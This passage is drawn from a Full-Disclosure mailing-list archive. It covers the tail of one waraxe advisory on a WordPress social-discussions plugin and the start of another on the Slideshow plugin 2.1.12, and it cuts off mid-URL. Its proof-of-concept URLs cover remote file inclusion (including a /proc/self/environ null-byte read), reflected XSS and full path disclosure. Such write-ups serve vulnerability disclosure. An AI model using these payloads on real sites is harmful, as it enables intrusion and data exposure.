"HTTP_ENV_VARS" is uninitialized and if in same time "register_globals=on", it is possible to fill that array with any value, leading to the RFI (Remote File Inclusion) vulnerability. Tests: http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/? http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z ### 2. Full Path Disclosure in multiple scripts ### Reasons: Direct request to php script triggers pathname leak in error message Preconditions: PHP directive display_errors=on Result: Information Exposure Through an Error Message Tests: http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php Fatal error: Call to undefined function __() in C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2 http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php Fatal error: Call to undefined function __() in C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2 http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php Fatal error: Call to undefined function __() in C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php on line 3 Contact: ~~~ come2war...@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ -- [ EOF ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2012-SA#092] - Multiple Vulnerabilities in Wordpress Slideshow Plugin
[waraxe-2012-SA#092] - Multiple Vulnerabilities in Wordpress Slideshow Plugin === Author: Janek Vind "waraxe" Date: 17. October 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-92.html Description of vulnerable target: ~~~ Slideshow provides an easy way to integrate a slideshow for any WordPress installation. Any image can be loaded into the slideshow by picking it from the WordPress media page, even images you've already uploaded can be inserted into your slideshow right away! http://wordpress.org/extend/plugins/slideshow-jquery-image-gallery/ Affected version: 2.1.12 ### 1. Reflected XSS in "views/SlideshowPlugin/slideshow.php" ### Reasons: 1. Uninitialized variables "$randomId", "$slides" and "$settings" 2. Improper encoding or escaping of output Attack vectors: User-supplied parameters "randomId", "slides" and "settings" Preconditions: PHP directive register_globals=on Tests: http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=";>alert(123); http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=alert(123); http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?settings= ### 2. Reflected XSS in "views/SlideshowPluginPostType/settings.php" ### Reasons: 1. Uninitialized variables "$settings" and "$inputFields" 2. Improper encoding or escaping of output Attack vectors: User-supplied parameters "settings" and "inputFields" Preconditions: PHP directive register_globals=on Tests: http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=alert(123); http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[0][]&inputFields[0]=alert(123); ### 3. Reflected XSS in "views/SlideshowPluginPostType/style-settings.php" ### Reasons: 1. Uninitialized variables "$settings" and "$inputFields" 2. Improper encoding or escaping of output Attack vectors: User-supplied parameters "settings" and "inputFields" Preconditions: PHP directive register_globals=on Tests: http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0][3]=alert(123); http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=alert(123); ### 4. Full Path Disclosure in multiple scripts ### Reasons: Direct request to php script triggers pathname leak in error message Preconditions: PHP directive display_errors=on Result: Information Exposure Through an Error Message Tests: http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/slideshow.php Fatal error: Call to undefined function add_action() in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\slideshow.php on line 34 http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/classes/SlideshowPluginWidget.php Fatal error: Class 'WP_Widget' not found in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\classes\SlideshowPluginWidget.php on line 8 http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php Fatal error: Class 'SlideshowPluginMain' not found in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPlugin\slideshow.php on line 111 http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/information.php Fatal error: Call to undefined function _e() in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\information.php on line 1 http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/Slides